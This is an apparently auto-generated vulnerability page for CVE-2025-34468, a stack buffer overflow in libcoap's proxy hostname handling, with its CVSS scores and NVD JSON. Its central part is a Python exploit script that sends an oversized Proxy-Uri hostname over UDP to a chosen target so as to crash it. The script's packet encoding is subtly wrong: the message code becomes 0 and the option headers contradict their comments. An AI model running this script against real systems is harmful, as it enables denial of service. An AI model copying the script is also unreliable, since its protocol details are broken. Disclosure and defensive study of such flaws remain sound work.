Security Vulnerability Report
CVE-2025-34468 CVSS 9.8 CRITICAL

Published: 2025-12-31 19:15:44
Last Modified: 2026-01-14 20:18:33

Description

libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap).

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:* - VULNERABLE
libcoap <= 4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-34468 PoC - libcoap Stack Buffer Overflow in Address Resolution
This PoC demonstrates sending a crafted CoAP proxy request with oversized Hostname.
Note: This is for educational and authorized testing purposes only.
"""
import socket
import struct


def create_coap_packet():
    """Create a CoAP packet with oversized Hostname option"""
    # CoAP Header
    version = 1
    message_type = 1  # CON
    token_length = 0
    code = 0.02  # POST
    message_id = 0x1234
    header = (version << 6) | (message_type << 4) | token_length
    first_byte = header

    # Build options
    options = b''

    # Uri-Path option (must be before Proxy-Uri)
    options += struct.pack('B', 0x0E)  # Option Delta = 0, Length = 1
    options += struct.pack('B', ord('p'))

    # Proxy-Uri option with oversized hostname
    # Option number 35, critical and unsafe option
    oversized_hostname = 'A' * 300  # Exceeds 256-byte buffer
    proxy_uri = f'coap://{oversized_hostname}/test'

    # Option header: delta=3 (Proxy-Uri), length encoded
    options += struct.pack('B', 0x35)  # Delta=3, Length=5
    options += struct.pack('B', len(proxy_uri))
    options += proxy_uri.encode('utf-8')

    # Payload marker
    payload = b'\xff'

    # Construct packet
    packet = bytes([first_byte, int(code), (message_id >> 8) & 0xFF, message_id & 0xFF])
    packet += options + payload
    return packet


def send_exploit(target_host, target_port=5683):
    """Send the exploit to target"""
    packet = create_coap_packet()
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(packet, (target_host, target_port))
        print(f'[+] Exploit packet sent to {target_host}:{target_port}')
        print(f'[+] Packet size: {len(packet)} bytes')
        print(f'[+] Oversized hostname length: 300 bytes')

        # Try to receive response
        try:
            data, addr = sock.recvfrom(1024)
            print(f'[*] Received response from {addr}: {data.hex()}')
        except socket.timeout:
            print('[*] No response received (target may have crashed)')
    except Exception as e:
        print(f'[-] Error: {e}')
    finally:
        sock.close()


if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print('Usage: python3 cve_2025_34468_poc.py <target_ip>')
        sys.exit(1)
    target = sys.argv[1]
    send_exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34468", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:43.923", "lastModified": "2026-01-14T20:18:32.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap)."}, {"lang": "es", "value": "Las versiones de libcoap hasta la 4.3.5 inclusive, anteriores al commit 30db3ea, contienen un desbordamiento de búfer basado en pila en la resolución de direcciones cuando datos de nombre de host controlados por el atacante se copian en un búfer de pila fijo de 256 bytes sin una comprobación de límites adecuada. Un atacante remoto puede provocar un fallo y potencialmente lograr la ejecución remota de código dependiendo de las opciones del compilador y las protecciones de memoria en tiempo de ejecución. 
La explotación requiere que la lógica de proxy esté habilitada (es decir, la ruta de código de manejo de solicitudes de proxy en una aplicación que usa libcoap)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.3.5", "matchCriteriaId": "22875932-4B0B-490A-AE0E-751EBC7CD54A"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/commit/30db3ea", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/obgm/libcoap/pull/1737", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://libcoap.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/libcoap-stack-based-buffer-overflow-in-address-resolution-dos-or-potential-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}